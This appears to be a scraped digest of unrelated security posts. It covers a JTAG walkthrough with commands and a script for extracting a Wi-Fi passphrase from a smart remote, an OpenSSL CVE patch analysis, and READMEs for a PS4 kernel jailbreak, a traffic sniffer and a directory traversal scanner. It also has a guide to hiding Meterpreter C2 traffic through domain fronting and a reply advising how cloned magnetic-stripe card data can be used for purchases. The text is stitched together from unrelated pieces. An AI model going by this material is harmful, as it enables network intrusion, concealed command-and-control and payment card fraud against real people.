The target device is the BroadLink RM Pro universal remote control designed for home convenience and automation. This smart remote control can be used to control multiple home appliances through its application. It also allows users to create scenarios whereby multiple actions can be programmed and activated simultaneously.

Device setup and functionality is accessed through the BroadLink e-Control application. This application must be running on a device connected to the same Wi-Fi network as the smart remote and the appliance you want to control.

[Image: BroadLink e-Control application]

For the purpose of this challenge, setting up the device is required. In a real scenario, the device would likely already be set up. Start by connecting the smart remote to a Wi-Fi network and entering the Wi-Fi SSID and passphrase within the e-Control application. The application then subsequently tries to locate the device within the network and, once it is found, a connection is established. Now that the smart remote is functional, an attacker who has physical access to the device may attempt to extract configuration or sensitive information loaded in memory. Successfully replicating this attack scenario is the main goal of this challenge.

Taking a look inside

The first step is to investigate the internal components of the device, starting by carefully taking apart the unit. There are three easily removable housing screws situated on the underside of the device. Once opened, we can then identify different points of interest within the device. These can be internal or external ports, the board's chips, components, model and serial numbers. Identifying the chip's model and serial number is essential and will provide us with the information we need in latter stages.

[Image: Inside the BroadLink RM Pro Smart remote]

Looking for ways to communicate with the device is another key step. When working with embedded architectures, the presence of debug interfaces such as UART and JTAG is a common method used to establish serial connectivity to the device.

JTAG

Joint Test Action Group, or more simply JTAG, is a standardised type of serial communication commonly used by engineers and developers to perform on-board testing or diagnostics of embedded devices, also known as boundary scanning. Another functionality of JTAG, which is seemingly more used today, is CPU-level debugging allowing read-write access to registers and memory.

The JTAG interface uses four connection points, also known as the Test Access Port or TAP. These connection points correspond to four signals, plus an optional fifth:

TDI – Test Data In; this signal represents input data sent to the device
TDO – Test Data Out, which represents output data from the device
TCK – Test Clock, used to synchronise data from the TMS and TDI (rising edge of Test Clock) and TDO (falling edge of Test Clock)
TMS – Test Mode Select; this signal is used to control the state of the TAP controller
TRST – Test Reset; this is an optional signal used for resetting the TAP controller

Identifying JTAG pinouts

The implementation of JTAG is non-standardised, which means that the signal pinouts you may encounter will vary between devices.
Aside from standalone JTAG connection points, commonly seen JTAG interfaces may be part of a 10-pin, 14-pin, 16-pin or 20-pin header.

[Image: JTAG pinouts]

Looking closely at the device, the five connection points on the corner of the board are the JTAG interface. Using JTAG's debugging functionality should enable us to read and write data stored in memory.

Note: Some devices will have JTAG present but their connections will have been disabled before being released into production.

There are various tools available which can be used to identify JTAG signal pinouts, all of which vary in available features and pricing. Common examples are JTAGenum (for Arduino), JTAGulator and Hydrabus, to name a few. For the purpose of this challenge, a JTAGulator is used. The JTAGulator supports a number of functionalities, including the identification of both UART and JTAG pinouts.

[Image: The JTAGulator]

Connecting the JTAGulator

The JTAGulator is connected to the smart remote starting from the lowest number of channels/pins on the board (CH0-CH4). The lowest numbered pinouts are used due to the brute-force method used by the JTAGulator to identify the signal value for each pinout. Using the lowest pin numbers decreases the number of permutations to iterate through and ultimately speeds up the identification process.

[Image: JTAGulator connected to the device's JTAG pins]

Once connected, you can control the JTAGulator via its USB connection, which will appear as a serial interface. A number of terminal emulators such as PuTTY, Hyperterminal or Minicom can be used to interface with the JTAGulator. In this instance, we will use the 'screen' utility, which is installed by default on many Linux distributions. It can be used to establish a serial connection to the JTAGulator via the default ttyUSB0 device on Linux machines. The JTAGulator's baudrate of 115200 should also be provided, like so:

$ sudo screen /dev/ttyUSB0 115200

Once a serial connection to the JTAGulator is established, pressing the 'h' key shows a list of JTAG commands available. The first step is to set the target voltage to 3.3V, which pertains to the voltage required by the microprocessor. 3.3V is commonly used by most chips; however, accurate information regarding the operational voltage can be found by looking through the chip's specification sheet. Setting the correct voltage is important, as an incorrect voltage could damage or destroy the device.

After setting the voltage, the "Identify JTAG pinout (IDCODE Scan)" command can be used to identify JTAG pins, which works by reading the device IDs – specifically, the TDO, TMS and TCK signals. To identify the TDI pin, the BYPASS scan is used. When running the scans, enter the number of channels to use as five; this will allow the JTAGulator to use the connections made on channels CH0 to CH4. The scans should complete fairly quickly, as there are only five pins exposed on the board, resulting in a lower number of permutations to be made. If the JTAG implementation appears alongside multiple pinouts, this can increase the number of permutations, thus increasing the duration of the scan.

[Image: Identifying JTAG pinouts (BYPASS scan)]

The results of the BYPASS scan show us the location of the signal pinouts on the JTAGulator, which correspond to the signal pinouts on the smart remote. You can skip this step entirely if the JTAG pinouts are labelled on the silkscreen print on the board, so do not forget to check both sides of the PCB, as it may save valuable time.
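If you would rather script the session than type into screen, the same serial port can be driven from Python with the pyserial package (a sketch; it only sends the 'h' help command mentioned above — the JTAGulator's other single-character menu commands should be read from that output rather than assumed here):

import serial  # pip install pyserial

jt = serial.Serial("/dev/ttyUSB0", 115200, timeout=2)
jt.write(b"h")                                 # ask for the command menu
print(jt.read(4096).decode(errors="replace"))  # dump whatever it prints back
jt.close()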
[Image: JTAG signal pinouts printed underneath the board]

The Shikra

In order for us to get debug access on the smart remote, a JTAG adapter and an OCD system are required. Many devices on the market allow interfacing with JTAG, such as the Bus Pirate, Shikra and HydraBus. For this scenario, the Shikra and OpenOCD are used. The Shikra is an FT232H USB device often referred to as the "Swiss army knife of hardware hacking"; this device allows us to connect to a number of data interfaces, including UART, JTAG and SPI. A Shikra can be purchased from Xipiter: https://int3.cc/products/the-shikra

[Image: The Shikra]

The following diagram shows the Shikra pinouts for JTAG, which will be used to connect to the board's corresponding JTAG pinouts. Ensure that the ground (GND) pin is also connected to a ground point on the board.

[Image: Shikra JTAG connections – http://www.xipiter.com/uploads/2/4/4/8/24485815/shikra_documentation.pdf]

[Image: The Shikra giving serial to USB connectivity]

OpenOCD

OpenOCD allows us to perform on-chip debugging of the smart remote via JTAG. On Linux-based systems, you can install the OpenOCD package by running the following command:

$ sudo apt-get install openocd

In order for us to use OpenOCD, a configuration file for the adapter (Shikra) and the target (smart remote) are required. OpenOCD comes with a number of pre-installed interface and target configuration files; however, the one required does not come in the pre-installed list. The configuration file for the adapter can be found in Xipiter's getting started guide for the Shikra.

Shikra OpenOCD configuration file:

#shikra.cfg
interface ftdi
ftdi_vid_pid 0x0403 0x6014
ftdi_layout_init 0x0c08 0x0f1b
adapter_khz 2000
#end shikra.cfg

Obtaining the configuration file for the target was not as straightforward. The configuration file required was not available within the pre-installed configuration files, and attempting to use any of them results in compatibility errors with the device. The approach taken in identifying the appropriate target configuration file involved looking up the microprocessor's make and model. Using a magnifying glass or a good enough camera, the specific chip printings can be determined. The chip in question is a Marvell 88MC200, and a simple Google search of this chip and the keyword OpenOCD returns the target configuration needed.

#
# Marvell's Wireless Microcontroller Platform (88MC200)
#
# https://origin-www.marvell.com/microcontrollers/wi-fi-microcontroller-platform/
#
#source [find interface/ftdi/mc200.cfg]

if { [info exists CHIPNAME] } {
   set _CHIPNAME $CHIPNAME
} else {
   set _CHIPNAME mc200
}

set _ENDIAN little

# Work-area is a space in RAM used for flash programming
# By default use 16kB
if { [info exists WORKAREASIZE] } {
   set _WORKAREASIZE $WORKAREASIZE
} else {
   set _WORKAREASIZE 0x4000
}

# JTAG scan chain
if { [info exists CPUTAPID] } {
   set _CPUTAPID $CPUTAPID
} else {
   set _CPUTAPID 0x4ba00477
}

jtag newtap $_CHIPNAME cpu -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_CPUTAPID

set _TARGETNAME $_CHIPNAME.cpu
target create $_TARGETNAME cortex_m -endian $_ENDIAN -chain-position $_TARGETNAME

$_TARGETNAME configure -work-area-phys 0x2001C000 -work-area-size $_WORKAREASIZE -work-area-backup 0

# Flash bank
set _FLASHNAME $_CHIPNAME.flash
flash bank $_FLASHNAME mrvlqspi 0x0 0 0 0 $_TARGETNAME 0x46010000

# JTAG speed should be <= F_CPU/6.
# F_CPU after reset is 32MHz
# so use F_JTAG = 3MHz
adapter_khz 3000
adapter_nsrst_delay 100

if {[using_jtag]} {
   jtag_ntrst_delay 100
}

if {![using_hla]} {
   # if srst is not fitted use SYSRESETREQ to
   # perform a soft reset
   cortex_m reset_config sysresetreq
}

The above configuration file was pointing to an interface path (line 7) which was not required and has therefore been commented out. The configuration file previously downloaded will be used instead, with its location specified as a command line argument to OpenOCD. Once both target and interface configuration files are saved locally, run the following OpenOCD command:

$ openocd -f /usr/share/openocd/scripts/interface/shikra.cfg -f /usr/share/openocd/scripts/target/mc200.cfg

The file paths point to the shikra.cfg file, which contains the interface configuration, and mc200.cfg, which contains the target board configuration. The on-chip debugger should now be running and will open local port 4444 on your system. You can then simply connect to this port with Telnet:

$ telnet localhost 4444

Dumping the device memory

Once connected, debug access to the board is now possible and allows control of registers and memory addresses. Before the registers can be accessed, sending a halt request is required to put the target into a debugging state. After sending the halt request, the reg command can be used to view all of the available registers and their values on the device's CPU. The full list of useful commands is available in the OpenOCD documentation.

[Image: Register values shown in OpenOCD]

Highlighted in the above image is the Stack Pointer (SP) register. Discussing how computer addressing works is beyond the scope of this blog (it is not a simple subject!). For now, it is enough to understand that the Stack Pointer holds the address of the last value pushed onto the stack in memory (RAM), serving as a starting address from which user space memory can be accessed.

Going back to the original goal of extracting sensitive information from the device, the dump_image command can be used to dump memory contents. To successfully dump as much information as possible, a trial and error approach to identify the boundaries of user space memory can be taken. The dump_image command can be used as follows:

$ dump_image img_out2 0x20002898 120000

The img_out2 argument is the output filename; the next argument is the Stack Pointer address; and the final argument is the amount of memory to dump in bytes.

[Image: Dumping memory to a file]

The image above shows that initial attempts at dumping memory may fail if a larger number of bytes than what is available is specified. After successfully dumping the contents of memory, an analysis of the file can be performed to identify any information that might be of interest.

[Image: Wi-Fi passphrase next to the SSID]

A hex editor of your choice can be used to navigate around the contents of the file and, in the example above, we have used GHex. Looking around the file and by performing a quick search, we can see the SSID name the device is connected to. 18 bytes after it, the passphrase was also shown. If we had purchased this device second-hand, then we could potentially use it to access someone's home network and launch further attacks.
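Searching the dump can also be scripted instead of scrolling through a hex editor. A short Python sketch (the SSID string and the 18-byte offset are taken from the example above and will differ between devices; the 8-63 printable-character run matches the legal length of a WPA2 passphrase):

import re
import sys

# usage: python find_psk.py img_out2 MySSID   (hypothetical helper script)
path, ssid = sys.argv[1], sys.argv[2].encode()
data = open(path, "rb").read()

for m in re.finditer(re.escape(ssid), data):
    start = m.end() + 18   # passphrase observed 18 bytes after the SSID in this dump
    cand = re.match(rb"[\x20-\x7e]{8,63}", data[start:start + 64])
    print(f"SSID at offset {m.start():#x}:",
          cand.group().decode() if cand else "<no printable run found>")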
Conclusion

Cyber attacks on smart home devices should now be recognised by home consumers. On the other hand, manufacturers should consider methods for securing the hardware aspect – the very foundation of these devices – to ensure the security and privacy of their users. Cisco's hardware hacking challenges give us the opportunity to learn different methods to tamper with or attack a device, therefore promoting a greater understanding of the security risks and controls they present.

This post has presented a simple proof-of-concept attack on a consumer smart device, whereby a user's Wi-Fi passphrase can be extracted, therefore allowing an attacker to achieve persistent access to a victim's network. This type of attack can be prevented by disabling – or, more effectively, removing – the JTAG ports completely from production devices, thereby minimising the attack surface.

Source: https://labs.portcullis.co.uk/blog/jtag-on-chip-debugging-extracting-passwords-from-memory/
-
CVE-2018-0739: OpenSSL ASN.1 stack overflow

This was a vulnerability discovered by Google's OSS-Fuzz project and it was fixed by Matt Caswell of the OpenSSL development team. The vulnerability affects OpenSSL releases prior to 1.0.2o and 1.1.0h and, based on the OpenSSL team's assessment, it cannot be triggered via SSL/TLS, but constructed ASN.1 types with support for recursive definitions, such as PKCS7, can be used to trigger it.

/*
 * Decode an item, taking care of IMPLICIT tagging, if any. If 'opt' set and
 * tag mismatch return -1 to handle OPTIONAL
 */
static int asn1_item_embed_d2i(ASN1_VALUE **pval, const unsigned char **in,
                               long len, const ASN1_ITEM *it,
                               int tag, int aclass, char opt, ASN1_TLC *ctx)
{
    const ASN1_TEMPLATE *tt, *errtt = NULL;
    const ASN1_EXTERN_FUNCS *ef;
    const ASN1_AUX *aux = it->funcs;
    ASN1_aux_cb *asn1_cb;
    const unsigned char *p = NULL, *q;
    unsigned char oclass;
    char seq_eoc, seq_nolen, cst, isopt;
    long tmplen;
    int i;
    int otag;
    int ret = 0;
    ASN1_VALUE **pchptr;

    if (!pval)
        return 0;
    if (aux && aux->asn1_cb)
        asn1_cb = aux->asn1_cb;
    else
        asn1_cb = 0;

    switch (it->itype) {
    ...
    return 0;
}

What you see above is a snippet of crypto/asn1/tasn_dec.c where the ASN.1 decoding function asn1_item_embed_d2i() is located. Neither this function nor any of its callers had any check for recursive definitions. This means that given a malicious PKCS7 file, this decoding routine will keep on trying to decode nested items until the process runs out of stack space.

To fix this, a new error case was added in the crypto/asn1/asn1.h header file, named ASN1_R_NESTED_TOO_DEEP. If we have a look at crypto/asn1/asn1_err.c, we can see that the new error code is equivalent to the "nested too deep" error message.

     {ERR_REASON(ASN1_R_NESTED_ASN1_STRING), "nested asn1 string"},
+    {ERR_REASON(ASN1_R_NESTED_TOO_DEEP), "nested too deep"},
     {ERR_REASON(ASN1_R_NON_HEX_CHARACTERS), "non hex characters"},

Similarly, a new constant (ASN1_MAX_CONSTRUCTED_NEST) definition was added, which defines the maximum number of recursive invocations of the asn1_item_embed_d2i() function. You can see the new definition in crypto/asn1/tasn_dec.c.

#include <openssl/err.h>

/*
 * Constructed types with a recursive definition (such as can be found in PKCS7)
 * could eventually exceed the stack given malicious input with excessive
 * recursion. Therefore we limit the stack depth. This is the maximum number of
 * recursive invocations of asn1_item_embed_d2i().
 */
#define ASN1_MAX_CONSTRUCTED_NEST 30

static int asn1_check_eoc(const unsigned char **in, long len);

Lastly, the asn1_item_embed_d2i() function itself was modified to take a new integer argument, "depth", which is used as a counter for each recursive invocation. You can see how the check is performed before entering the switch clause here.

    asn1_cb = 0;

    if (++depth > ASN1_MAX_CONSTRUCTED_NEST) {
        ASN1err(ASN1_F_ASN1_ITEM_EMBED_D2I, ASN1_R_NESTED_TOO_DEEP);
        goto err;
    }

    switch (it->itype) {
    case ASN1_ITYPE_PRIMITIVE:

Similarly, all calling functions in OpenSSL have been updated to ensure that the new argument is used as intended.
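The shape of the fix is easy to demonstrate outside of C. The toy DER walker below (an illustration of the depth-counter idea only, not OpenSSL code) recurses once per constructed nesting level, just as asn1_item_embed_d2i() does, and caps the recursion the same way the patch does:

MAX_NEST = 30  # mirrors ASN1_MAX_CONSTRUCTED_NEST

def walk(der: bytes, depth: int = 0) -> None:
    """Minimal DER TLV walker; recursion depth tracks nesting depth."""
    if depth > MAX_NEST:
        raise ValueError("nested too deep")
    i = 0
    while i < len(der):
        tag, length = der[i], der[i + 1]
        if length & 0x80:                        # long-form length
            n = length & 0x7F
            length = int.from_bytes(der[i + 2:i + 2 + n], "big")
            i += 2 + n
        else:                                    # short-form length
            i += 2
        if tag & 0x20:                           # constructed type: recurse
            walk(der[i:i + length], depth + 1)
        i += length

def seq(body: bytes) -> bytes:
    """DER-encode a SEQUENCE around body."""
    if len(body) < 0x80:
        return b"\x30" + bytes([len(body)]) + body
    n = (len(body).bit_length() + 7) // 8
    return b"\x30" + bytes([0x80 | n]) + len(body).to_bytes(n, "big") + body

bomb = b"\x05\x00"                               # innermost NULL
for _ in range(1000):                            # 1000 nested SEQUENCEs
    bomb = seq(bomb)
walk(bomb)  # raises "nested too deep" instead of burning a stack frame per level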
The official security advisory describes the above vulnerability like this:

Constructed ASN.1 types with a recursive definition could exceed the stack (CVE-2018-0739)
==========================================================================================

Severity: Moderate

Constructed ASN.1 types with a recursive definition (such as can be found in
PKCS7) could eventually exceed the stack given malicious input with excessive
recursion. This could result in a Denial Of Service attack. There are no such
structures used within SSL/TLS that come from untrusted sources so this is
considered safe.

OpenSSL 1.1.0 users should upgrade to 1.1.0h
OpenSSL 1.0.2 users should upgrade to 1.0.2o

This issue was reported to OpenSSL on 4th January 2018 by the OSS-fuzz project.
The fix was developed by Matt Caswell of the OpenSSL development team.

Source: https://xorl.wordpress.com/2018/03/30/cve-2018-0739-openssl-asn-1-stack-overflow/
-
Microsoft Security Response Center (MSRC)
Published 14 Feb 2018

Rob Turner, Qualcomm Technologies

Almost three decades since the Morris worm and we're still plagued by memory corruption vulnerabilities in C and C++ software. Exploit mitigations aim to make the exploitation of these vulnerabilities impossible or prohibitively expensive. However, modern exploits demonstrate that currently deployed countermeasures are insufficient. In ARMv8.3, ARM introduces a new hardware security feature, pointer authentication. With ARM and ARM partners, including Microsoft, we helped to design this feature. Designing a processor extension is challenging. Among other requirements, changes should be transparent to developers (except compiler developers), support both system and application code, interoperate with legacy software, and provide binary backward compatibility. This talk discusses the processor extension and explores the design trade-offs, such as the decision to prefer authentication over encryption and the consequences of small tags. Also, this talk provides a security analysis, and examines how these new instructions can robustly and efficiently implement countermeasures.

Presentation Slide Deck: https://www.slideshare.net/MSbluehat/...
53R3N17Y | Python based script for Information Gathering.

Operating Systems Tested
OSX El Capitan 10.11
Ubuntu 16.04
Backbox 5

Install

MacOSX (as root):

git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity
echo 'alias serenity="cd /usr/local/share/serenity && ./serenity"' >> ~/.zshrc
cd /usr/local/share/serenity
pip install -r requirements.txt
serenity -h

Linux (as root):

git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity
echo 'alias serenity="cd /usr/local/share/serenity && ./serenity"' >> ~/.bashrc
cd /usr/local/share/serenity
pip install -r requirements.txt
serenity -h

Note: tested with Python 2.7.14.

Source: https://github.com/abaykan/53R3N17Y
Jailbreak Kernel Patches

Features
Jailbreak
Sandbox escape
Debug settings
Enable UART
Disable system update messages
Delete system updates
Fake self support
Fake pkg support
RPC server
RPC client in C#

I use the standard fake pkg keys, created by flatz.

General Notes

Only for 4.55 Jailbroken PlayStation 4 consoles! The main jkpatch payload utilizes a port of CTurt's payload sdk. Change the Makefile to have LIBPS4 point to the ps4-payload-sdk directory on your machine. I could have it referenced from the home directory but meh...

# change this to point to your ps4-payload-sdk directory
LIBPS4 := /home/John/ps4-payload-sdk/libPS4

If you decide to edit the resolve code in the kernel payload, make sure you do not mess with...

void resolve(uint64_t kernbase);

... as it is called from crt0.s, and changing this will produce errors. See other branches for other kernel support. I will support the latest publicly exploited firmware on the main branch.

RPC Quickstart

See either Example.cs or look at the RPC documentation. You can read/write memory, call functions, read/write kernel memory, and even load elfs. Here is a cool example of an elf loaded into COD Ghosts (forge mod made by me!). You can download the source code to the forge mod here. Have fun!

Coming Soon
General code clean up and refactoring

Thank you to flatz, idc, zecoxao, hitodama, osdev.org, and anyone else I forgot!

Twitter: @cloverleafswag3
psxhax: g991
golden <3

Source: https://github.com/xemio/jkpatch
Yes, it can be done. https://en.wikipedia.org/wiki/Magnetic_stripe_card But the cloned card will (probably) not be usable for cash withdrawals at an ATM. It can be used for purchases, either online (the card doesn't even need to be cloned for that, as long as the CVV is not required) or in stores that still accept magnetic stripe payments (in the US, for example; around here more rarely).
The data on the magnetic stripe includes: the card number, the cardholder's name and the expiration date. The magnetic stripe can be copied onto another card. The data can also be used for online payments (where the CVV is not required).
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
NetRipper - Added Metasploit module
https://github.com/NytroRST/NetRipper
Could someone run some tests? It would be useful to know whether there are any problems with either the traffic capture or the Metasploit module. Any suggestion is appreciated.
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
NetRipper - Added support for WinSCP 5.1.3 https://github.com/NytroRST/NetRipper -
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
NetRipper - Added support for Putty 0.7.0 (64 bits) https://github.com/NytroRST/NetRipper -
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
NetRipper - Added support for Putty 0.7.0 (32 bits) -
Tallow - Transparent Tor for Windows

Tallow is a small program that redirects all outbound traffic from a Windows machine via the Tor anonymity network. Any traffic that cannot be handled by Tor, e.g. UDP, is blocked. Tallow also intercepts and handles DNS requests, preventing potential leaks.

Tallow has several applications, including:
"Tor-ifying" applications that were never designed to use Tor
Filter circumvention -- if you wish to bypass a local filter and are not so concerned about anonymity
Better-than-nothing-Tor -- some Tor may be better than no Tor.

Note that, by itself, Tallow is not designed to be a complete strong anonymity solution. See the warnings below.

Usage

Using the Tallow GUI, simply press the big "Tor" button to start redirecting traffic via the Tor network. Press the button again to stop Tor redirection. Note that your Internet connection may be temporarily interrupted each time you toggle the button. To test if Tor redirection is working, please visit the following site: https://check.torproject.org.

Technical

Tallow uses the following configuration to connect to the Internet:

+-----------+        +-----------+        +-----------+
|    PC     |------->|    TOR    |------->|  SERVER   |
|  a.b.c.d  |<-------|  a.b.c.d  |<-------|  x.y.z.w  |
+-----------+        +-----------+        +-----------+

Here (a.b.c.d) represents the local address, and (x.y.z.w) represents a remote server.

Tallow uses WinDivert to intercept all traffic to/from your PC. Tallow handles two main traffic types: DNS traffic and TCP streams.

DNS queries are intercepted and handled by Tallow itself. Instead of finding the real IP address of a domain, Tallow generates a pseudo-random "fake" IP (in the range 44.0.0.0/24) and uses this address in the query response. The fake-IP is also associated with the domain and recorded in a table for later reference. The alternative would be to look up the real IP via Tor (which supports DNS). However, since Tallow uses SOCKS4a, the real IP is not necessary. Handling DNS requests locally is significantly faster.

TCP connections are also intercepted. Tallow "reflects" outbound TCP connects into inbound SOCKS4a connects to the Tor program. If the connection is to a fake-IP, Tallow looks up the corresponding domain and uses this for the SOCKS4a connection. Otherwise the connection is blocked (by default) or a SOCKS4 direct connection via Tor is used. Connecting TCP to SOCKS4(a) is possible with a bit of magic (see redirect.c).

All other traffic is simply blocked. This includes all inbound (non-Tor) traffic and outbound traffic that is not TCP nor DNS. In addition, Tallow blocks all domains listed in the hosts.deny file. This includes domains such as Windows update, Windows phone home, and some common ad servers, to help prevent Tor bandwidth wastage. It is possible to edit and customize your hosts.deny file as you see fit.

Note that Tallow does not intercept TCP ports 9001 and 9030 that are used by Tor. As a side-effect, Tallow will not work on any other program that uses these ports.

History

Tallow was derived from the TorWall prototype (where "tallow" is an anagram of "torwall" minus the 'r'). Tallow works slightly differently, and aims to redirect all traffic rather than just HTTP port 80. Also, unlike the prototype, Tallow does not use Privoxy nor does it alter the content of any TCP streams in any way (see warnings below).

Building

To build Tallow you need the MinGW cross-compiler for Linux.
You also need to download the following external dependencies and place them in the contrib/ directory:
WinDivert-1.4.0-rc-B-MINGW.zip
tor-win32-0.3.2.9.zip

Then simply run the build.sh script.

TODOs

More comprehensive hosts.deny: by default Windows will "phone home" on a regular basis for various reasons. Tallow attempts to block most of this traffic by default via the hosts.deny file. However, it is unclear how comprehensive the current blacklist really is. Suggestions for new entries are welcome.

Warnings

Currently Tallow makes no attempt to anonymize the content of traffic sent through the Tor network. This information may be used to de-anonymize you. See this link for more information. Tallow should not be relied on for strong anonymity unless you know what you are doing.

Source: https://github.com/basil00/TorWall
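The fake-IP bookkeeping described above is easy to prototype. A minimal Python sketch of the idea (not Tallow's actual C code; Tallow picks fake addresses pseudo-randomly, while this version hands them out sequentially for simplicity):

import ipaddress

# Pool of fake addresses to hand out in DNS responses (44.0.0.0/24, as above)
_pool = (str(ip) for ip in ipaddress.ip_network("44.0.0.0/24").hosts())
_domain_to_ip = {}
_ip_to_domain = {}

def fake_ip_for(domain):
    # Answer a DNS query with a fake IP, remembering the mapping
    if domain not in _domain_to_ip:
        ip = next(_pool)  # raises StopIteration if the /24 pool is exhausted
        _domain_to_ip[domain] = ip
        _ip_to_domain[ip] = domain
    return _domain_to_ip[domain]

def domain_for(ip):
    # When a TCP connect to a fake IP is later intercepted, recover the
    # domain and use it in the SOCKS4a request instead of a real address
    return _ip_to_domain.get(ip)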
Twitter Scraper

Twitter's API is annoying to work with, and has lots of limitations — luckily their frontend (JavaScript) has its own API, which I reverse-engineered. No API rate limits. No restrictions. Extremely fast.

You can use this library to get the text of any user's Tweets trivially. Very useful for making markov chains.

Usage

>>> from twitter_scraper import get_tweets
>>> for tweet in get_tweets('kennethreitz', pages=1):
...     print(tweet)
P.S. your API is a user interface
s3monkey just hit 100 github stars! Thanks, y'all!
I'm not sure what this /dev/fd/5 business is, but it's driving me up the wall.
…

It appears you can ask for up to 25 pages of tweets reliably (~486 tweets).

Markov Example

First, install markovify:

$ pipenv install markovify

>>> import markovify
>>> tweets = '\n'.join([t for t in get_tweets('kennethreitz', pages=25)])
>>> text_model = markovify.Text(tweets)
>>> print(text_model.make_short_sentence(140))
Wtf you can't use APFS on a prototype for "django-heroku", which does a lot out of me.

Installation

$ pipenv install twitter-scraper

Only Python 3.6+ is supported.

Source: https://github.com/kennethreitz/twitter-scraper
New bypass and protection techniques for ASLR on Linux

By Ilya Smith (@blackzert), Positive Technologies researcher

0. Abstract

The Linux kernel is used on systems of all kinds throughout the world: servers, user workstations, mobile platforms (Android), and smart devices. Over the life of Linux, many new protection mechanisms have been added both to the kernel itself and to user applications. These mechanisms include address space layout randomization (ASLR) and stack canaries, which complicate attempts to exploit vulnerabilities in applications.

This whitepaper analyzes ASLR implementation in the current version of the Linux kernel (4.15-rc1). We found problems that allow bypassing this protection partially or in full. Several fixes are proposed. We have also developed and discussed a special tool to demonstrate these issues. Although all issues are considered here in the context of the x86-64 architecture, they are also generally relevant for most Linux-supported architectures.

Many important application functions are implemented in user space. Therefore, when analyzing the ASLR implementation mechanism, we also analyzed part of the GNU Libc (glibc) library, during which we found serious problems with stack canary implementation. We were able to bypass stack canary protection and execute arbitrary code by using ldd. This whitepaper describes several methods for bypassing ASLR in the context of application exploitation.

1. ASLR

Address space layout randomization is a technology designed to impede exploitation of certain vulnerability types. ASLR, found in most modern operating systems, works by randomizing addresses of a process so that an attacker is unable to know their location. For instance, these addresses are used to:

Delegate control to executable code.
Make a chain of return-oriented programming (ROP) gadgets (1).
Read (overwrite) important values in memory.

The technology was first implemented for Linux in 2005. In 2007, it was introduced in Microsoft Windows and macOS as well. For a detailed description of ASLR implementation in Linux, see (2).

Since the appearance of ASLR, attackers have invented various methods of bypassing it, including:

Address leak: certain vulnerabilities allow attackers to obtain the addresses required for an attack, which enables bypassing ASLR (3).
Relative addressing: some vulnerabilities allow attackers to obtain access to data relative to a particular address, thus bypassing ASLR (4).
Implementation weaknesses: some vulnerabilities allow attackers to guess addresses due to low entropy or faults in a particular ASLR implementation (5).
Side channels of hardware operation: certain properties of processor operation may allow bypassing ASLR (6).

Note that ASLR is implemented very differently on different operating systems, which continue to evolve in their own directions. The most recent changes in Linux ASLR involved Offset2lib (7), which was released in 2014. Implementation weaknesses allowed bypassing ASLR because all libraries were in close proximity to the binary ELF file image of the program. The solution was to place the ELF file image in a separate, randomly selected region. In April 2016, the creators of Offset2lib also criticized the current implementation, pointing out the lack of entropy by ASLR-NG when selecting a region address (8). However, no patch has been published to date.

With that in mind, let's take a look at how ASLR currently works on Linux.
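As a quick illustration of randomization in action: every process on an ASLR-enabled Linux system gets freshly randomized mappings, so reading the memory maps of two consecutive processes shows different addresses. Each grep below is a new process inspecting its own map; the addresses shown are illustrative:

$ grep stack /proc/self/maps
7ffe3a91d000-7ffe3a93e000 rw-p 00000000 00:00 0          [stack]
$ grep stack /proc/self/maps
7ffc21f56000-7ffc21f77000 rw-p 00000000 00:00 0          [stack]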
Full article: http://blog.ptsecurity.com/2018/02/new-bypass-and-protection-techniques.html
dotdotslash

A tool to help you search for Directory Traversal Vulnerabilities.

Benchmarks

Platforms that I tested to validate tool efficiency:
DVWA (low/medium/high)
bWAPP (low/medium/high)

Installation

You can download the last version by cloning this repository:

git clone https://github.com/jcesarstef/dotdotslash/

This tool was made to work with Python3.

Usage

python3 dotdotslash.py --help
usage: dotdotslash.py [-h] --url URL --string STRING [--cookie COOKIE]

optional arguments:
  -h, --help       show this help message and exit
  --url URL        Url to attack.
  --string STRING  String in --url to attack. Ex: document.pdf
  --cookie COOKIE  Document cookie.

Example:

python3 dotdotslash.py \
  --url "http://192.168.58.101/bWAPP/directory_traversal_1.php?page=a.txt" \
  --string "a.txt" \
  --cookie "PHPSESSID=089b49151627773d699c277c769d67cb; security_level=3"

Links

My twitter: https://twitter.com/jcesarstef
My Linkedin: https://www.linkedin.com/in/jcesarstef
My Blog (Brazilian Portuguese only for now): http://www.inseguro.com.br

Source: https://github.com/jcesarstef/dotdotslash
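For context, scanners of this kind iterate candidate payloads against the vulnerable parameter. A minimal illustrative Python sketch of how such candidates can be generated (not necessarily dotdotslash's exact wordlist):

# Typical directory traversal candidates, plain and URL-encoded
target = "etc/passwd"
plain = ["../" * n + target for n in range(1, 7)]
encoded = ["..%2f" * n + target for n in range(1, 7)]
for payload in plain + encoded:
    print(payload)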
Domain Fronting with Meterpreter

Posted on November 30, 2017

Domain Fronting is a technique that is typically used for censorship evasion. It relies on popular Content Delivery Networks (CDNs) such as Amazon's CloudFront to mask traffic origins. By changing the HTTP Host header, the CDN will happily route us to the correct server. Red Teams have been using this technique for hiding C2 traffic by using high-reputation redirectors. For more information on Domain Fronting, please refer to this whitepaper.

Setting up CloudFront

Log in to AWS, and navigate to CloudFront. You will need a domain name that you own, or acquired for free from a registrar like Freenom. Once you are logged into AWS, click Create Distribution. The Origin Domain Name will be the domain that you own. You also need to match the origin protocol policy (HTTP/HTTPS), so that CloudFront routes both types of traffic to you.

Under Default Cache Behavior Settings, we need to tweak a few settings so that the CDN caches as little traffic as possible:
Allow all HTTP methods possible.
Set Cache Based on Selected Request Headers to All.
For Forward Cookies, also select All.
For Query String Forwarding and Caching, select Forward all, cache based on all.

Full article: https://bitrot.sh/post/30-11-2017-domain-fronting-with-meterpreter/
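A quick way to sanity-check such a setup is to request the CDN edge directly while supplying the fronted Host header; if the distribution is configured correctly, the response comes from your origin rather than the CDN default. The distribution and domain names below are hypothetical:

$ curl -s https://d1234567890abc.cloudfront.net/ -H "Host: yourdomain.com"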
What's New in Qubes 4

Mar 01, 2018 By Kyle Rankin in Desktop, Qubes, Security

Considering making the move to Qubes 4? This article describes a few of the big changes.

In my recent article "The Refactor Factor", I talked about the new incarnation of Linux Journal in the context of a big software project doing a refactor:

